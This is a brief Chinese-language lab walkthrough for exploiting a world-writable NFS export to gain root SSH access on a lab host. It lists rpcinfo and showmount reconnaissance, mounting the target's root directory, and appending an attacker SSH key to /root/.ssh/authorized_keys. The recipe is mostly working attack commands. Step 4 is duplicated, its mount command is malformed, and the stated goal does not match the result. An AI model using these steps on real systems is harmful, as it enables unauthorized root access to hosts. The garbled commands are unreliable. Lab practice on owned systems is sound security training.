Linux NFS共享目录配置漏洞

目的：

利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容

原理：

NFS服务配置漏洞赋予了根目录远程可写权限，导致/root/.ssh/authorized_keys可被修改，实现远程ssh无密码登录。

准备：

1. Kali系统版本2.0
2. 主机IP：192.168.1.2   靶机IP：192.168.1.3

实战：

Step1：查看目标主机上NFS服务是否开启：

在终端输入rpcinfo -p 192.168.1.3

Step2:显示指定的远程共享目录列表：

在终端输入showmount -e 192.168.1.3

Step3:生成rsa公钥：

在终端输入ssh-keygen

Step4:在终端输入mkdir /tmp/tool，建立tool目录；在终端输入mount -t nfs 192.168.1.3:/tmp/tool,把192.168.1.3根目录挂载到/tmp/tool目录下Step4:在终端输入mkdir /tmp/tool，建立tool目录；在终端输入mount -t nfs 192.168.1.3:/tmp/tool,把192.168.1.3根目录挂载到/tmp/tool目录下

Step5：把生成的公钥追加到靶机的authorized_keys下，实现ssh免密码登录：

在终端输入cat  /root/.ssh/id_rsa.pub>>/tmp/tool/root/.ssh/authorized_keys

Step6:在终端输入ssh root@192.168.1.3